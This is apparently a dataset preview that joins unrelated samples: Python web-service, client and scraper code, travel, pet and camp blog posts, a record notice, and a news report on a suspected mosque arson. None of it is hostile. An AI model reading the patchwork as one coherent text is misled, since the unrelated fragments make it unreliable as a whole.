Users are only able to be ranked if they have completed 5 or more
games. The leaderboard is able to be filtered by dice operation and/or
number of tiles.
:param number_of_tiles (opt): Filters leaderboard by number of tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): Filters leaderboard by dice operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param username (opt): If specified returns rank of only that user.
:type username: string
:returns ranked_users: List of users ordered by rank. Each user is
made up of the parameters below.
:rtype ranked_users: list
:returns username: A unique username.
:rtype username: string
:returns total_score: Total score of completed games.
:rtype total_score: integer
:returns total_turns: Total number of turns for completed games.
:rtype total_turns: integer
:returns average_score: Average score from completed games.
:rtype average_score: float
:returns average_turns: Average turns from completed games.
:rtype average_turns: float
:returns games_completed: Number of games completed.
:rtype games_completed: integer
:returns rank: Rank of the user.
:rtype rank: integer
:returns message: Helpful error message.
:rtype message: string
:raises: NotFoundException"""
if request.username:
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
users = User.query().fetch()
if not users:
return TotalLeaderboardResultForm(message="No users created yet!")
# Create an empty leaderboard list. It will be filled with instances
# of the UserStats named tuple
leaderboard = []
UserStats = namedtuple('UserStats',
['total_score', 'average_score', 'average_turns',
'games_completed', 'username'])
for user in users:
games_query = Game.query(ancestor=user.key)
# Only use games that are over
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games = games_query.fetch()
# If this user has played less than 5 games, don't rank them. Must
# complete 5 or more games to become ranked, due to the nature of
# ranking in Shut The Box. It would be too easy for one user to
# play one game, get a perfect score, and then suddenly overtake
# the leaderboard
if len(games) < 5:
continue
(games_completed, total_score, total_turns, average_score,
average_turns) = Game.games_stats(games)
user_stats = UserStats(total_score, average_score,
average_turns, games_completed, user.username)
leaderboard.append(user_stats)
# if no users have completed games quit early
if not leaderboard:
return TotalLeaderboardResultForm(message="No rankable users"\
"yet!")
# Now to sort the results in this specific way
leaderboard.sort(key=attrgetter('average_score', 'average_turns',
'username'))
# Now to assign rank on the already sorted leaderboard list. It's not
# as simple as just using enumerate because of possible ties
rank = 0
last_average_score = -1
last_average_turns = -1
for n, user in enumerate(leaderboard):
rank += 1
# Take into account the tie scenario
if user.average_score == last_average_score and \
user.average_turns == last_average_turns:
rank -= 1
# Need to put the UserStats object in a list so append will work
leaderboard[n] = [leaderboard[n]]
leaderboard[n].append(rank)
# Save off the last ranked user's statistics
last_average_score = user.average_score
last_average_turns = user.average_turns
# If username is specified, make that the only result in the leaderboard
if request.username:
for ranked_user in leaderboard:
if ranked_user[0].username == request.username:
leaderboard = [ranked_user]
if leaderboard[0][0].username is not request.username:
return TotalLeaderboardResultForm(
message="{} is not ranked yet!".format(request.username))
# Now loop through the leaderboard one last time and put the content
# into a form
forms = []
for ranked_user in leaderboard:
user_stats = ranked_user[0]
rank = ranked_user[1]
leaderboard_form = UserLeaderboardResultForm(
username=user_stats.username,
average_score=user_stats.average_score,
average_turns=user_stats.average_turns,
total_score=user_stats.total_score,
games_completed=user_stats.games_completed,
rank=rank)
forms.append(leaderboard_form)
return TotalLeaderboardResultForm(ranked_users=forms)
@endpoints.method(request_message=URLSAFE_KEY_REQUEST,
response_message=AllTurnsReportResultForm,
path='game_history',
name='game_history',
http_method='POST')
def get_game_history(self, request):
"""Returns the history of moves for the game passed in, allowing game
progression to be viewed move by move.
:param urlsafe_key (req): This is the urlsafe_key returned
from calling new_game(). It serves as the state token for a single
game of Shut The Box.
:type urlsafe_key: string
:returns turns: A list of turns for a specific game. Each turn contains
the parameters below.
:rtype turns: list
:returns turn: The turn number.
:rtype turn: integer
:returns roll: The dice roll for that turn.
:rtype roll: list of non-negative integers
:returns tiles_played: The tiles flipped that turn.
:rtype tiles_played: a list of non-negative integers.
:returns score: A running total of the active tiles in play.
:rtype score: non-negative integer
:returns game_over: If True, game is over. If False,
more turns can be played.
:rtype game_over: boolean
:raises: BadRequestException, ValueError"""
game = get_by_urlsafe(request.urlsafe_key, Game)
turns = Turn.query(ancestor=game.key).order(Turn.timestamp).fetch()
# Not all the information is present in the turns object for the game
# history report. We need to manipulate the active tiles so that it
# stores the tiles played, not the tiles on the board. To do that
# we loop through the turns and calculate the difference between the
# active tiles present in the last turn vs the active tiles in the
# current turn. We use python sets and set.difference to repurpose
# active_tiles. We also score the score of each turn in this new
# active_tiles because you wouldn't be able to calculate it anymore
# with active_tiles being repurposed.
# Ex:
# Before:
# Loop 1: active_tiles: [1,2,3,4,5,6,7,8,9]
# Loop 2: active_tiles: [1,2,3,4,5,6,7,8]
# Loop 3: active_tiles: [1,2,3,6,7,8]
#
# After:
# Loop 1: active_tiles: [45, []]
# Loop 2: active_tiles: [36, [9]]
# Loop 3: active_tiles: [27, [4,5]]
for turn in turns:
# set last_turn explicitly in the first loop
if turn.turn == 0:
last_turn = set(turn.active_tiles)
current_turn = set(turn.active_tiles)
tiles_played = list(last_turn.difference(current_turn))
# Set last_turn now for the next loop
last_turn = set(turn.active_tiles)
# Now we are going to repurpose turn.active_tiles to store the
# score and the tiles played
score = sum(turn.active_tiles)
turn.active_tiles = []
turn.active_tiles.append(score)
turn.active_tiles.append(tiles_played)
return AllTurnsReportResultForm(
turns=[turn.to_turn_report_result_form() for turn in turns])
# # ONLY UNCOMMENT/IMPORT THE MODULES BELOW IF USING THE test_method
# @endpoints.method(request_message=INSERT_OR_DELETE_REQUEST,
# response_message=InsertOrDeleteDataResultForm,
# path='test_method',
# name='test_method',
# http_method='POST')
# def test_method(self, request):
# if request.delete_everything:
# users = User.query().iter(keys_only=True)
# ndb.delete_multi(users)
# games = Game.query().iter(keys_only=True)
# ndb.delete_multi(games)
# turns = Turn.query().iter(keys_only=True)
# ndb.delete_multi(turns)
# return InsertOrDeleteDataResultForm(message="All Users, Games, "\
# "Turns deleted!")
# # some setup for creating request for new games
# version = "v1"
# port = 8080
# base_url = "http://localhost:{}/_ah/api/shut_the_box/{}/".\
# format(port, version)
# new_game_url = base_url + "new_game"
# # some setup for creating the games
# DICE_OPERATION = ["ADDITION", "MULTIPLICATION"]
# NUMBER_OF_TILES = ["NINE", "TWELVE"]
#
# with open("pkg/test_data.JSON") as data_file:
# json_data = json.load(data_file)
# users = json_data["users"]
# turns = json_data["turns"]
# for user in users:
# new_user = User(
# username=user["username"],
# email=user["email"])
# new_user.put()
# # Now to create the games
# for user in users:
# for n in range(20): # create 10 games per user
# dice_operation = random.choice(DICE_OPERATION)
# number_of_tiles = random.choice(NUMBER_OF_TILES)
# create_json = [{
# "dice_operation": dice_operation,
# "number_of_tiles": number_of_tiles,
# "username": user["username"]}]
# outside_request = outside_requests.post(
# url=new_game_url, params=create_json[0])
# raw_urlsafe_key = outside_request.json()["urlsafe_key"]
# game_entity = get_by_urlsafe(raw_urlsafe_key, Game)
# turn_list = random.choice(turns.get(
# dice_operation + number_of_tiles))
# for turn in turn_list.get("turn_list"):
# new_turn = Turn(
# key=Turn.create_turn_key(game_entity.key),
# active_tiles=turn.get("active_tiles"),
# roll=turn.get("roll"),
# turn=turn.get("turn"))
# if turn.get("turn_over"):
# new_turn.turn_over = turn.get("turn_over")
# if turn.get("game_over"):
# new_turn.game_over = turn.get("game_over")
# new_turn.put()
# final_score = turn_list.get("final_score")
# if final_score is not None:
# game_entity.final_score = final_score
# game_entity.game_over = True
# game_entity.put()
# return InsertOrDeleteDataResultForm(message="Data added "\
# "successfully!")
|
The Largest Salt Mosaic by a Team measured 600 Square meters and was created by 3366 participants of M/s. A.R.J Group of Institutions at M/s. A.R.J Public School (CBSE), Mannargudi, Thiruvarur District, Tamil Nadu, India on 9th March 2012. The Mosaic was completed in 5 Hours and the concept was “Save Water for Future”.
|
from netrackclient import errors
from netrackclient.netrack.v1 import constants
import collections
import ipaddress
_Network = collections.namedtuple("Network", [
"encapsulation",
"address",
"interface",
"interface_name",
])
class Network(_Network):
def __new__(cls, **kwargs):
kwargs = dict((k, kwargs.get(k)) for k in _Network._fields)
return super(Network, cls).__new__(cls, **kwargs)
class NetworkManager(object):
def __init__(self, client):
super(NetworkManager, self).__init__()
self.client = client
def _url(self, datapath, interface):
url = "{url_prefix}/datapaths/{datapath}/network/interfaces/{interface}"
return url.format(url_prefix=constants.URL_PREFIX,
datapath=datapath,
interface=interface)
def _encapsulation(self, address):
#TODO: add support of other protocols
network = ipaddress.ip_interface(address)
return "ipv{0}".format(network.version)
def update(self, datapath, interface, network):
url = self._url(datapath, interface)
# parse address to configure encapsulation
encapsulation = self._encapsulation(network.address)
try:
self.client.put(url, body=dict(
encapsulation=encapsulation,
address=network.address,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
def get(self, datapath, interface):
try:
response = self.client.get(self._url(
datapath=datapath,
interface=interface,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
return Network(**response.body())
def list(self, datapath):
url = "{url_prefix}/datapaths/{datapath}/network/interfaces"
url = url.format(url_prefix=constants.URL_PREFIX,
datapath=datapath)
try:
response = self.client.get(url)
except errors.BaseErorr as e:
raise errors.NetworkError(*e.args)
interfaces = []
for interface in response.body():
interfaces.append(Network(**interface))
return interfaces
def delete(self, datapath, interface, network):
url = self._url(datapath, interface)
# parse address to configure encapsulation
encapsulation = self._encapsulation(network.address)
try:
self.client.delete(url, body=dict(
encapsulation=encapsulation,
address=network.address,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
|
Today I am thrilled to welcome a friend of mine from high school who had an amazing experience while studying abroad in Florence, Italy for the summer. She is sharing her top tips for making the most of your summer study abroad! Without further ado, I present Ali from Sustainable Psyche.
If you’re interested in traveling and studying abroad but you’re not ready to commit to an entire year or even a semester program, a summer abroad might be the perfect opportunity for you. Considering that summer flies by in the blink of an eye, it takes a little bit of planning in order to create the best possible experience abroad.
In the summer of 2013 I did a study abroad program in Florence, Italy. It was one of the best decisions I ever made and it truly impacted my life in so many positive ways. Here’s some of my advice on how to make the most of a summer program.
Use the weekends to travel. During the week dedicate yourself to your studies and to getting to know the city that you’re living in. Go out to dinner, take evening walks and just wander during your free time in the week. On the weekends, on the other hand, travel elsewhere. Plan weekend trips within the country where you’re studying or check out cheap flights or trains to travel more economically to other nearby places. You really can do a lot. I jam packed my five available weekends by visiting more than fifteen other Italian cities including Milano, the island of Capri, Naples, Cinque Terre and Pisa.
Explore to the max. Wandering and finding random hidden gems can be the most rewarding. If you have the opportunity to visit museums or take short field trips through your study abroad program, don’t ever say no. Take all the chances to experience the new culture, sights, and food. Take the time to enjoy and mindfully take in what you are doing.
Embrace the fact that you are indeed a tourist and that it is ok to be one every once and a while. Visit all of your cities touristy places at least once.
Some of the most wonderful friendships can be created even in a short time. Get to know your fellow classmates right away so that you have friends to travel with on the weekends. If your school is an international school, try making friends with people from different cultures or from the country where you are residing. It’s truly a beautiful thing to maintain international friendships long after you return home.
A summer is way too short to become fluent in any language but knowing the basics and maybe taking a course before arriving will give you a boost. You will feel so much less like a foreigner and you will find that it’s very handy to know how to ask for directions or to read a menu. This is great way to immerse yourself into the culture and add another dimension to your experience.
Even though it is all good to go and see the tourist destinations and monuments: don’t stop there. Make a point to seek out the local places. When there are no tourists in sight and all you hear is the local language you are well on the right track. Some of the best restaurants, cafes, bars, etc. are the ones off the beaten path. It will also give you another chance to interact with the locals and see the way they live everyday life.
Of course pack your essentials, but don’t make the mistake of stuffing your bag full. Leave lots of room for souvenirs, new clothes and artisan items from local markets. You can always buy things once you’ve arrived.
If you have the chance to take a class that doesn’t really have anything to do with your major but will count as credits, do it! There is no better time to try something new. Take a language or history class about the culture you’re living in. I was a Psychology/Italian major at UW-Madison but in Florence I took a ceramics class with an amazing Italian artist for a teacher. It truly gave me an opportunity to broaden my interests and dabble in new things.
No, I don’t mean be antisocial. However, time abroad can be a great space for soul searching and getting to know yourself better. Take walks and go out to take pictures alone every once and a while. You’ll see things from a different angle.
In your own format, whether that be handwritten or electronic, you’ll be so glad later to have what you were feeling and experiencing in writing. Add as much detail as possible…even what you ate. Trust me, I’m so glad when I look back and can say “oh yeah, that pici pasta with cacio and pepe in Siena WAS so amazing.” It’s also a great way to reflect later on and see how you evolved throughout the time away.
Plan an extra side trip once your studies have concluded. I stayed in Europe 5 additional weeks to visit many different places (Palma de Majorca, Cologne, Amsterdam, Paris, Milan again and Rome). My parents even made the most of my study abroad, meeting me in Rome.
Five years ago to the day I was still gallivanting around Europe, yet the memories are crystal clear. Time away from home, your friends, and your family in a new culture can help you to discover who you are, giving you a new sense of freedom, fresh viewpoints, international friendships & most importantly: memories to last a lifetime. Following some of this advice, you will surely thrive and create your own personal and unique voyage. Buon viaggio!
|
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import ApiCli
import requests
import json
class EventGet(ApiCli):
def __init__(self):
ApiCli.__init__(self)
self.event_id = None
def add_arguments(self):
ApiCli.add_arguments(self)
self.parser.add_argument('-i', '--event-id', dest='event_id', action='store', required=True,
metavar='event_id', help='Event id of the event to fetch')
def get_arguments(self):
if self.args.event_id is not None:
self.event_id = self.args.event_id
self.path = "v1/events/{0}".format(self.event_id)
def get_description(self):
return "Gets a single event by id from a {0} account".format(self.product_name)
def _handle_results(self):
# Only process if we get HTTP result of 200
if self._api_result.status_code == requests.codes.ok:
out = json.dumps(json.loads(self._api_result.text), sort_keys=True, indent=4, separators=(',', ': '))
print(self.colorize_json(out))
|
Merry Christmas to the Kitties!!
Hey There to all my fellow Crazy Cat Ladies!!!
Today’s post is dedicated to cool toys and accessories for your favorite cat(s)!
I have a little somethin’ somethin’ for everyone from kittens to seniors and price points from a bit high to extremely reasonable. Everything on this page is something my kids own and play with and have the Lolly and Buddy stamp of approval!
But if you have a feline of more discriminating tastes, here are a few things they may love!
The Thermo Kitty Bed is a WONDERFUL cat bed! It has a micro-fleece shell that the cats absolutely love and a heater element that fits inside the padded bottom. I’ve had this bed for almost 15 years. It’s survived five cats, hairballs, snarf and barfs, and too many rounds in the washing machine to count. The current owner of the bed is the many times Great Grandniece of my first Abyssinian.
The standard bed (pictured with my cats) comes in two sizes; small and large and two color choices – cream/sage or cream/mocha. There is also a Deluxe Thermo-Kitty Bed with a zip-off hood for a more cavelike feeling It comes in two sizes as well and two colors (mocha or tan) with pretty leopard spot micro-fleece material inside.
The best thing about this bed is its washability. The outside zips off so you can remove the foam core and throw the cover in the laundry. I’ve also washed the inside foam with no issues after one too many vomits.
The heating element has not needed replacement, the vinyl coating on it has no signs of age or wear. The K&H Thermo-kitty cat bed is virtually indestructible. The only reason I’m considering replacing my bed is that after 15 years, the sleeping pad at the bottom is getting a bit thin and worn and I’m hesitant at replacing materials close to the heating element myself.
This video is from almost a year ago, and Buddy STILL plays with it!
Close up video of the Butterfly Ball.
I’ve had too many bad experiences with regular collars or harnesses on cats. They’ve slipped out of them, gotten tangled in them, hung up in bushes, etc. I was at wit’s end what to do about something that I could use to take my cats to the vet easily. The Kitty Holster turned out to be a Godsend. As it turned out, my disabled brother got a huge kick out of leash training the cats, but he has terrible arthritis, so having something with velcro helped him get the cat dressed. These jackets also fit snugly, so the cat is soothed by being wrapped up in it, much like a thunder blanket works for a dog. They come in numerous patterns and four sizes to fit most cats. Krazy K Farm also does custom orders.
My two cats are very treat motivated. Their current favorite treats are Kitty Cravings by Blue Buffalo and Temptations. Blue Buffalo is also offering an adorable stocking stuffer package for their chicken treats for the Holiday season.
I know, cats view us as two-legged treat dispensers, but we can’t provide as much exercise as a Kong Cat Wobbler Treat Dispenser. Treat dispensers are a big hit in my household as long as they don’t give up their treats too readily. Well, they’re hits with me, Lolly would rather they just spew everything all at once. The Kong brand dispenser makes them work a little and provides a lot of play and exercise time.
From the tiniest kitten to our elder states-cats, the red dot is a perpetual winner!! This one is a handy take-anywhere keychain model … because you never know when you’ll find a cat who wants to play!
I love Kong products (in case you couldn’t tell), they are durable and long lasting. These refillable catnip toys are very durable, light, and lots of fun. Keep three or four fresh and filled in a Ziploc bag to bring out when boredom sets in.
There are hundreds of great programs and businesses out there who are selflessly dedicated to helping abandoned and feral cats. Instead of buying your kids more toys that they might never play with, please consider donating food or money to one of these wonderful programs. Please see my Instagram post with the same picture as above for a list of individuals and agencies who help cats on the street, in shelters, and in foster homes. They all have links in their profiles on how to help. Thank You!
Happy Holidays from my babies to yours!!
|
# encoding: utf-8
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
import pytest
from mock import MagicMock
from jormungandr.parking_space_availability.car.star import StarProvider
from jormungandr.parking_space_availability.car.parking_places import ParkingPlaces
poi = {
'properties': {
'operator': 'Keolis Rennes',
'ref': '42'
},
'poi_type': {
'name': 'parking relais',
'id': 'poi_type:amenity:parking'
}
}
def car_park_space_availability_start_support_poi_test():
"""
STAR car provider support
"""
provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
assert provider.support_poi(poi)
def car_park_space_get_information_test():
parking_places = ParkingPlaces(available=4,
occupied=3,
available_PRM=2,
occupied_PRM=0)
provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
star_response = """
{
"records":[
{
"fields": {
"nombreplacesdisponibles": 4,
"nombreplacesoccupees": 3,
"nombreplacesdisponiblespmr": 2,
"nombreplacesoccupeespmr": 0
}
}
]
}
"""
import json
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == parking_places
invalid_poi = {}
assert provider.get_informations(invalid_poi) is None
provider._call_webservice = MagicMock(return_value=None)
assert provider.get_informations(poi) is None
star_response = """
{
"records":[
{
"fields": {
}
}
]
}
"""
empty_parking = ParkingPlaces(available=None,
occupied=None,
available_PRM=None,
occupied_PRM=None)
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == empty_parking
star_response = """
{
"records":[
]
}
"""
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == empty_parking
# Information of PRM is not provided
parking_places = ParkingPlaces(available=4,
occupied=3)
provider = StarProvider('Keolis Rennes', 'toto', 42)
star_response = """
{
"records":[
{
"fields": {
"nombreplacesdisponibles": 4,
"nombreplacesoccupees": 3
}
}
]
}
"""
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
info = provider.get_informations(poi)
assert info == parking_places
assert not hasattr(info, "available_PRM")
assert not hasattr(info, "occupied_PRM")
|
Updated: Oct 2000. Intended to serve as a very brief introduction to the options available for using the Lego Group's Mindstorm Robotics Invention System (RIS) from within Linux. It also can be used as a gathering point for more information.
Updated: Aug 2007. Intended for anyone interested in installing and using IBM DB2® Express-C 9 database on Linux®.
|
#!/usr/bin/env python
import os, time
import sqlite3 as lite
import populatedb as pdb
class AmpycheApp():
def __init__(self):
ANSN = ('N', 'n', 'No', 'no')
ANSY = ('Y', 'y', 'Yes', 'yes')
self.ANSN = ANSN
self.ANSY = ANSY
self.pdb = pdb
def _get_selection(self):
print("""
\nWelcome to Ampyche. Please select the appropriate action.
1. Setup Ampyche.
2. Rescan/Add new music.
3. Setup Ampyche using an already existing
Ampache mysql database.
""")
selection = input("---> ")
return selection
def _get_music_path(self):
print("""
\nPlease enter the path to where the music files reside.
For example: /home/music: """)
m_path = input("---> ")
m_path = str(m_path)
return m_path
def _select_one(self, a_path):
gettags = pdb.Ampyche()
gettags = gettags.run(a_path)
def _select_two(self):
print("selection two")
#update = self.upd.UpdateDb()
#update = update._update()
##############################################################
## Start of MySQL stuff
def _get_hostname(self):
print("""
Please enter the Hostname of the MySql Database. """)
response = input("---> ")
return response
def _get_username(self):
print("""
Please enter the MySql Database Username. """)
response = input("---> ")
return response
def _get_password(self):
print("""
Please enter the MySql Database Password. """)
response = input("---> ")
#need to validate for letters and numbers only
return response
def _get_dbname(self):
print("""
Please enter the MySql Database Name. """)
response = input("---> ")
#need to validate for letters and numbers only
return response
def _select_three(self, ):
print("selection three")
# hostname = self._get_hostname()
# username = self._get_username()
# password = self._get_password()
# dbname = self._get_dbname()
#make db connection and generate static files.
#do more stuff here
def main(self):
selection = self._get_selection()
music_path = self._get_music_path()
if selection == '1':
make_it_so = self._select_one(music_path)
print("selection 1 complete")
if selection == '2':
make_it_so2 = self._select_two()
print("selection 2 complete")
if selection == '3':
print("this is selection three")
if __name__ == "__main__":
app = AmpycheApp()
app = app.main()
|
March 24 – Police are investigating a fire at a Southern California mosque on Sunday as a possible arson and hate crime after fresh graffiti on the driveway mentioned the mass shootings at two mosques in New Zealand, local media reported.
Police and firefighters were called to the Islamic Center of Escondido – north of San Diego – at about 3:15 a.m. (10:15 GMT) on Sunday about a fire that blackened an outside wall, The San Diego Tribune and other media reported.
Congregants at the center smelled smoke, spotted the fire and put it out before it caused serious damage before firefighters arrived, media reported.
But on the mosque's driveway, police found fresh graffiti that referenced the March 15 shootings at two mosques in Christchurch, New Zealand, that left 50 people dead and others seriously injured from a gunman who published a hate-filled manifesto on social media, police told the press.
Yusef Miller – a spokesman for the Islamic community in Escondido – told the Tribune that people at mosques across the region need to remain vigilant.
"Everyone is on edge," he told the paper. "When they connected it to New Zealand, it gave us more of a mortal fear that something outlandish might happen."
|
# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import time
from sets import Set
import re
import os
import cookielib
# 构造 Request headers
agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36'
refer = 'http://interfacelift.com//wallpaper/7yz4ma1/04020_jetincarina_1440x900.jpg'
acceot = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
uir = '1'
host = 'interfacelift.com'
connection = 'keep-alive'
pragma = 'no-cache'
acencode = 'gzip, deflate, sdch'
acln = 'en,zh-CN;q=0.8,zh;q=0.6'
headers = {
'User-Agent': agent
#'Referer':refer
}
# 使用登录cookie信息
session = requests.session()
def get_tags():
url = "https://interfacelift.com/wallpaper/tags/"
baseurl = "https://interfacelift.com"
tags = session.get(url).text.encode('utf-8')
tagsoup = BeautifulSoup(tags, 'html5lib')
cloud = tagsoup.select('.cloud', _candidate_generator=None, limit=None)
for item in cloud:
try:
links = item.select('a')
print len(links)
floder = 0
for link in links:
try:
taglink = link['href']
taglink = baseurl + taglink
tagname = link.next_element.encode('utf-8')
filepath = os.getcwd() + '/wallpaper/' + str(floder)
print taglink
print filepath
print os.path.exists(filepath)
if not os.path.exists(filepath):
os.mkdir(filepath)
floder += 1
linkend = 1
picinit = taglink + "index" + str(linkend) + ".html"
while download(picinit, filepath):
linkend += 1
picinit = taglink + "index" + \
str(linkend) + ".html"
else:
floder += 1
continue
except:
floder += 1
print "下载出错"
except Exception, e:
print "出错了"
def download(picurl, path):
delchar = ['%2C', '%27']
if picurl:
unique = Set()
picpage = session.get(picurl).text
picsoup = BeautifulSoup(picpage.encode('utf-8'), 'html5lib')
divsoup = picsoup.select('a[href^="/wallpaper/details"]')
if divsoup:
try:
split = 0
for li in divsoup:
if split % 4 == 0:
baseurl = li['href'].split('/', -1)
id = int(baseurl[3])
subbase = baseurl[4].split('.', -1)
cleanbase = subbase[0].replace('_', '')
if '%2C' in cleanbase or '%27' in cleanbase:
cleanbase = cleanbase.replace('%2C', '')
cleanbase = cleanbase.replace('%27', '')
downloadurl = get_picurl(cleanbase, id, foo='1440x900')
print downloadurl, "--->", path
print cleanbase
get_file(downloadurl, cleanbase, path)
split += 1
return True
except:
print "获取链接失败"
return False
else:
return False
else:
return False
def get_picurl(base=None, id=None, foo='1440x900'):
baseurl = "http://interfacelift.com"
if base and id:
suburl = "/wallpaper/7yz4ma1/" + \
str(id) + '_' + base + '_' + foo + '.jpg'
picurl = baseurl + suburl
return picurl
def get_file(url, filename, path):
if url:
r = session.get(url, headers=headers)
# print r.text.encode('utf-8')
print filename
picname = path + "/" + filename + '.jpg'
with open(picname, 'wb') as f:
f.write(r.content)
print picname, "完成下载"
# f.close()
time.sleep(3)
# get_tags()
# get_file("http://interfacelift.com/wallpaper/7yz4ma1/01178_chicagoatnight_1440x900.jpg",'adas','.')
def test():
get_tags()
test()
|
I'm not an outdoors person. I don't like bugs. I don't like the heat. I'm not really into outdoors stuff. But I LOVE 4-H camp and the magic that happens when teens use their leadership skills to deliver the camp program!
For more than 20 years, I have been coordinating an overnight 4-H camp for grades 3-6, as well as day camps. My goal for the campers is that they are safe, have fun, make new friends and want to come back the following year. What motivates me to coordinate camps? It's the magic that happens when teenagers become camp counselors!
I strive to apply these principles within the training for camp counselors and then guide the teenagers to create this environment for younger campers.
4-H camp is an authentic opportunity for camp counselors to use their skills in real time. They learn skills and then apply them in the planning, implementation and evaluation of an actual camp. In Van Linden and Fertman’s book, “Youth Leadership: A Guide to Understanding Leadership Development in Adolescents”, they describe three stages of leadership development – awareness, interaction and mastery – which are sequential but fluid.
Awareness is when a young person realizes they have leadership skills and is capable of being a leader.
Interaction is about action. It’s testing possibilities, reaching limits, resting and reflecting.
Mastery involves having the energy, resources and guidance to pursue a personal vision.
When a young person comes to my camp counselor program, they are at the interaction stage. They believe they have the skills to be a camp counselor and are ready to interact and master. I model the youth development principles with the camp counselors as they learn, develop and implement a camp for younger members. They master these skills when they return the next year as camp counselors and take on more responsibility for different aspects of camp.
I may not like bugs and the outdoors, but I do love the mastery that teenage youth gain as 4-H camp counselors!
Thanks Kate! I have seen the notice for the new issues of the Journal for Youth Development. It's on my list to check out!
I'm with you - not a fan of camp but strongly believe in the positive experiences it provides for campers and youth leaders. I appreciated your point about mastery that happens when they return as counselors for a second year. Moving up the "ladder of leadership" is so important.
Thanks Becky! The camp counselor experience gives youth the confidence to utilize their skills in other parts of our program - State Ambassadors for example. And continue to "master" their leadership ability in all parts of their life.
I had such mixed experiences as a youth at camp. Being a camper was often a lonely and isolating experience. There were several camps I tried once and never returned to.
But later in my youth, I was scaffolded into camp leadership roles...junior counselor, counselor and camp director. It was there, as a leader, that I found my confidence, my joy and my power to create safe and meaningful experiences for others.
I love how much young people can grow at camp when they're given leadership roles. Even kids like me who were crummy campers can fall in love with camp and discover their ability to make a difference...when we lead.
Thanks for sharing Erin. I'm glad you found your "place" at camp where you could grow and be empowered. I am striving to train teen-aged youth about positive impacts they can have on campers, so they have a positive experience, not a lonely one like yours.
I listened to the podcast this week and was so intrigued with how Karyn was able to share so much more information in just 20 minutes! Thinking about the steps to prepare a young person for a more active leadership role is exciting as we as youth development professionals not only can help guide that process, but also witness it in action.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.